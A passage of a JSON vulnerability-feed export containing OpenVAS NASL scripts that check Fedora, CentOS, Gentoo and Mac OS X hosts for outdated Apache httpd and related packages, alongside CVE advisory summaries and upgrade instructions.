script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:41 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\",\n \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-1598\");\n script_name(\"Fedora Update for httpd FEDORA-2012-1598\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.22~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2012:0128 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881089", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2012:0128 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881089\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:05:13 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"CESA\", value:\"2012:0128\");\n script_name(\"CentOS Update for httpd CESA-2012:0128 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n '.htaccess' file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the 'apache' user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2012-1642", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863759", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2012-1642\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-March/074371.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863759\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-07 11:18:18 +0530 (Wed, 07 Mar 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-1642\");\n script_name(\"Fedora Update for httpd FEDORA-2012-1642\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.22~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-02T10:57:22", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2012-1642", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:863759", "href": "http://plugins.openvas.org/nasl.php?oid=863759", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2012-1642\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"httpd on Fedora 15\";\ntag_insight = \"The Apache HTTP Server is a powerful, efficient, and extensible\n web server.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-March/074371.html\");\n script_id(863759);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-07 11:18:18 +0530 (Wed, 07 Mar 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-1642\");\n script_name(\"Fedora Update for httpd FEDORA-2012-1642\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.22~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:14", "description": "The remote host is missing updates announced in\nadvisory GLSA 201206-25.", "cvss3": {}, "published": "2012-08-10T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201206-25 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2010-0434", "CVE-2012-0031", "CVE-2010-2791", "CVE-2012-0883", "CVE-2010-0408", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368", "CVE-2011-3192", "CVE-2010-1452", "CVE-2011-3348"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:136141256231071551", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071551", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201206_25.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71551\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2010-0408\", \"CVE-2010-0434\", \"CVE-2010-1452\", \"CVE-2010-2791\", \"CVE-2011-3192\", \"CVE-2011-3348\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2012-0883\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:22:53 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201206-25 (apache)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were found in Apache HTTP Server.\");\n script_tag(name:\"solution\", value:\"All Apache HTTP Server users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-2.2.22-r1'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201206-25\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=308049\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=330195\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=380475\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=382971\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=385859\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=389353\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=392189\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=398761\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=401081\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=412481\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201206-25.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-servers/apache\", unaffected: make_list(\"ge 2.2.22-r1\"), vulnerable: make_list(\"lt 2.2.22-r1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-24T12:50:42", "description": "The remote host is missing updates announced in\nadvisory GLSA 201206-25.", "cvss3": {}, "published": "2012-08-10T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201206-25 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2010-0434", "CVE-2012-0031", "CVE-2010-2791", "CVE-2012-0883", "CVE-2010-0408", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368", "CVE-2011-3192", "CVE-2010-1452", "CVE-2011-3348"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:71551", "href": "http://plugins.openvas.org/nasl.php?oid=71551", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were found in Apache HTTP Server.\";\ntag_solution = \"All Apache HTTP Server users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-2.2.22-r1'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201206-25\nhttp://bugs.gentoo.org/show_bug.cgi?id=308049\nhttp://bugs.gentoo.org/show_bug.cgi?id=330195\nhttp://bugs.gentoo.org/show_bug.cgi?id=380475\nhttp://bugs.gentoo.org/show_bug.cgi?id=382971\nhttp://bugs.gentoo.org/show_bug.cgi?id=385859\nhttp://bugs.gentoo.org/show_bug.cgi?id=389353\nhttp://bugs.gentoo.org/show_bug.cgi?id=392189\nhttp://bugs.gentoo.org/show_bug.cgi?id=398761\nhttp://bugs.gentoo.org/show_bug.cgi?id=401081\nhttp://bugs.gentoo.org/show_bug.cgi?id=412481\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201206-25.\";\n\n \n \nif(description)\n{\n script_id(71551);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2010-0408\", \"CVE-2010-0434\", \"CVE-2010-1452\", \"CVE-2010-2791\", \"CVE-2011-3192\", \"CVE-2011-3348\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2012-0883\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:22:53 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201206-25 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-servers/apache\", unaffected: make_list(\"ge 2.2.22-r1\"), vulnerable: make_list(\"lt 2.2.22-r1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-19T10:50:34", "description": "This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2012-004.", "cvss3": {}, "published": "2012-09-25T00:00:00", "type": "openvas", "title": "Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3722", "CVE-2011-4317", "CVE-2012-2311", "CVE-2011-3026", "CVE-2012-2386", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-4599", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2688", "CVE-2011-3389", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368", "CVE-2012-0670", "CVE-2012-0650", "CVE-2012-1172", "CVE-2011-3048", "CVE-2012-0671", "CVE-2012-1173", "CVE-2012-0831", "CVE-2012-0668", "CVE-2012-3719"], "modified": "2017-07-04T00:00:00", "id": "OPENVAS:802968", "href": "http://plugins.openvas.org/nasl.php?oid=802968", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_macosx_su12-004.nasl 6521 2017-07-04 14:51:10Z cfischer $\n#\n# Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to cause a buffer overflow,\n disclose potentially sensitive information or cause a DoS.\n Impact Level: System/Application\";\ntag_affected = \"Apache\n BIND\n CoreText\n Data Security\n DirectoryService\n ImageIO\n Installer\n International Components for Unicode\n Kernel\n LoginWindow\n Mail\n Mobile Accounts\n PHP\n Profile Manager\n QuickLook\n QuickTime\n Ruby\n USB\";\ntag_insight = \"For more information on the vulnerabilities refer to the links below.\";\ntag_solution = \"Run Mac Updates and update the Security Update 2012-004,\n For updates refer to http://support.apple.com/kb/DL1586\";\ntag_summary = \"This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2012-004.\";\n\nif(description)\n{\n script_id(802968);\n script_version(\"$Revision: 6521 $\");\n script_cve_id(\"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2012-0650\",\n \"CVE-2012-1173\", \"CVE-2012-3719\", \"CVE-2012-0831\", \"CVE-2012-1172\",\n \"CVE-2012-1823\", \"CVE-2012-2143\", \"CVE-2012-2311\", \"CVE-2012-2386\",\n \"CVE-2012-2688\", \"CVE-2012-0671\", \"CVE-2012-0670\", \"CVE-2012-3722\",\n \"CVE-2012-0668\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\",\n \"CVE-2011-3026\", \"CVE-2011-3048\", \"CVE-2011-4599\", \"CVE-2011-3048\",\n \"CVE-2011-3389\");\n script_bugtraq_id(51705, 51407, 51706, 55623, 52891, 55623, 51954, 53403, 49778,\n 53388, 53729, 47545, 54638, 53584, 53582, 55612, 49957, 50494,\n 50802, 52049, 52830, 51006, 52830);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 16:51:10 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-25 19:33:16 +0530 (Tue, 25 Sep 2012)\");\n script_name(\"Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT5501\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/DL1586\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/50628/\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html\");\n\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"pkg-lib-macosx.inc\");\n\n## Variable Initialization\nosName = \"\";\nosVer = \"\";\n\n## Get the OS name\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName){\n exit (0);\n}\n\n## Get the OS Version\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\n## Check for the Mac OS X and Mac OS X Server\nif(\"Mac OS X\" >< osName)\n{\n ## Check the affected OS versions\n if(version_is_equal(version:osVer, test_version:\"10.6.8\"))\n {\n ## Check for the security update 2012.004\n if(isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2012.004\")){\n security_message(0);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": 